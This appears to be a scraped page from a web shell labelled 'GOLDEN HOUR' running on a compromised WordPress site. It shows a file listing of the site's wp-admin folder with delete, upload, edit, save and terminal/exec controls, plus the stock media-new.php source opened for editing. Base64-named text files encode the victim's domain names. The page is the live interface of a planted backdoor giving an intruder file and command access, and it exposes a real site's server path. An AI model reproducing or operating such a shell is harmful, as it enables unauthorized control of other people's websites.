GOLDEN HOUR
DIR: /home/vlabbdco/public_html/wp-admin
UP
UPLOAD
Name
Size
Action
about.php
32.8 KB
DEL
admin-ajax.php
4.72 KB
DEL
admin-footer.php
2.77 KB
DEL
admin-functions.php
406 B
DEL
admin-header.php
8.42 KB
DEL
admin-post.php
1.63 KB
DEL
admin.php
11.85 KB
DEL
async-upload.php
3.74 KB
DEL
authorize-application.php
9.62 KB
DEL
bWFpbC52bGFiYmQuY29t.txt
53 B
DEL
comment.php
11.15 KB
DEL
credits.php
13.07 KB
DEL
[ css ]
-
DEL
custom-background.php
416 B
DEL
custom-header.php
426 B
DEL
customize.php
10.07 KB
DEL
d3d3LnZsYWJiZC5jb206NDQz.txt
53 B
DEL
d3d3LnZsYWJiZC5jb20=.txt
53 B
DEL
dmxhYmJkLmNvbQ==.txt
53 B
DEL
dmxhYmJkLmNvbQ==a.txt
217 B
DEL
dmxhYmJkLmNvbTo0NDM=.txt
53 B
DEL
edit-comments.php
13.43 KB
DEL
edit-form-advanced.php
28.29 KB
DEL
edit-form-blocks.php
14.68 KB
DEL
edit-form-comment.php
7.96 KB
DEL
edit-link-form.php
6.09 KB
DEL
edit-tag-form.php
9.89 KB
DEL
edit-tags.php
21.43 KB
DEL
edit.php
18.75 KB
DEL
erase-personal-data.php
3.16 KB
DEL
error_log
44.55 KB
DEL
export-personal-data.php
3.13 KB
DEL
export.php
10.71 KB
DEL
freedoms.php
13.76 KB
DEL
[ images ]
-
DEL
import.php
7.35 KB
DEL
[ includes ]
-
DEL
index.php
7 KB
DEL
install-helper.php
5.89 KB
DEL
install.php
16.51 KB
DEL
[ js ]
-
DEL
link-add.php
711 B
DEL
link-manager.php
4.12 KB
DEL
link-parse-opml.php
2.59 KB
DEL
link.php
2.67 KB
DEL
load-scripts.php
1.65 KB
DEL
load-styles.php
2.25 KB
DEL
[ maint ]
-
DEL
media-new.php
3.12 KB
DEL
media-upload.php
3.4 KB
DEL
media.php
5.47 KB
DEL
menu-header.php
9.68 KB
DEL
menu.php
14.19 KB
DEL
moderation.php
307 B
DEL
ms-admin.php
196 B
DEL
ms-delete-site.php
4.15 KB
DEL
ms-edit.php
216 B
DEL
ms-options.php
223 B
DEL
ms-sites.php
215 B
DEL
ms-themes.php
217 B
DEL
ms-upgrade-network.php
219 B
DEL
ms-users.php
215 B
DEL
my-sites.php
4.54 KB
DEL
nav-menus.php
43.75 KB
DEL
[ network ]
-
DEL
network.php
5.25 KB
DEL
options-discussion.php
15.08 KB
DEL
options-general.php
14.63 KB
DEL
options-head.php
492 B
DEL
options-media.php
6.15 KB
DEL
options-permalink.php
18.82 KB
DEL
options-privacy.php
7.89 KB
DEL
options-reading.php
9.63 KB
DEL
options-writing.php
8.42 KB
DEL
options.php
12.48 KB
DEL
plugin-editor.php
13.01 KB
DEL
plugin-install.php
6.21 KB
DEL
plugins.php
28.48 KB
DEL
post-new.php
2.64 KB
DEL
post.php
9.84 KB
DEL
press-this.php
2.33 KB
DEL
privacy-policy-guide.php
841 B
DEL
privacy.php
11.67 KB
DEL
profile.php
283 B
DEL
revision.php
5.4 KB
DEL
setup-config.php
15.44 KB
DEL
site-health-info.php
5.65 KB
DEL
site-health.php
5.25 KB
DEL
term.php
2.2 KB
DEL
theme-editor.php
14.68 KB
DEL
theme-install.php
21.48 KB
DEL
themes.php
43.78 KB
DEL
tools.php
3.37 KB
DEL
update-core.php
42.44 KB
DEL
update.php
12.59 KB
DEL
upgrade-functions.php
341 B
DEL
upgrade.php
5.47 KB
DEL
upload.php
13.67 KB
DEL
[ user ]
-
DEL
user-edit.php
32.71 KB
DEL
user-new.php
23.41 KB
DEL
users.php
19.45 KB
DEL
widgets.php
19.64 KB
DEL
Edit: media-new.php
<?php /** * Manage media uploaded file. * * There are many filters in here for media. Plugins can extend functionality * by hooking into the filters. * * @package WordPress * @subpackage Administration */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'upload_files' ) ) { wp_die( __( 'Sorry, you are not allowed to upload files.' ) ); } wp_enqueue_script( 'plupload-handlers' ); $post_id = 0; if ( isset( $_REQUEST['post_id'] ) ) { $post_id = absint( $_REQUEST['post_id'] ); if ( ! get_post( $post_id ) || ! current_user_can( 'edit_post', $post_id ) ) { $post_id = 0; } } if ( $_POST ) { if ( isset( $_POST['html-upload'] ) && ! empty( $_FILES ) ) { check_admin_referer( 'media-form' ); // Upload File button was clicked. $upload_id = media_handle_upload( 'async-upload', $post_id ); if ( is_wp_error( $upload_id ) ) { wp_die( $upload_id ); } } wp_redirect( admin_url( 'upload.php' ) ); exit; } $title = __( 'Upload New Media' ); $parent_file = 'upload.php'; get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'You can upload media files here without creating a post first. This allows you to upload files to use with posts and pages later and/or to get a web link for a particular file that you can share. There are three options for uploading files:' ) . '</p>' . '<ul>' . '<li>' . __( '<strong>Drag and drop</strong> your files into the area below. Multiple files are allowed.' ) . '</li>' . '<li>' . __( 'Clicking <strong>Select Files</strong> opens a navigation window showing you files in your operating system. Selecting <strong>Open</strong> after clicking on the file you want activates a progress bar on the uploader screen.' ) . '</li>' . '<li>' . __( 'Revert to the <strong>Browser Uploader</strong> by clicking the link below the drag and drop box.' ) . '</li>' . '</ul>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://wordpress.org/support/article/media-add-new-screen/">Documentation on Uploading Media Files</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/">Support</a>' ) . '</p>' ); require_once ABSPATH . 'wp-admin/admin-header.php'; $form_class = 'media-upload-form type-form validate'; if ( get_user_setting( 'uploader' ) || isset( $_GET['browser-uploader'] ) ) { $form_class .= ' html-uploader'; } ?> <div class="wrap"> <h1><?php echo esc_html( $title ); ?></h1> <form enctype="multipart/form-data" method="post" action="<?php echo admin_url( 'media-new.php' ); ?>" class="<?php echo esc_attr( $form_class ); ?>" id="file-form"> <?php media_upload_form(); ?> <script type="text/javascript"> var post_id = <?php echo absint( $post_id ); ?>, shortform = 3; </script> <input type="hidden" name="post_id" id="post_id" value="<?php echo absint( $post_id ); ?>" /> <?php wp_nonce_field( 'media-form' ); ?> <div id="media-items" class="hide-if-no-js"></div> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php';
SAVE FILE
TERMINAL
EXEC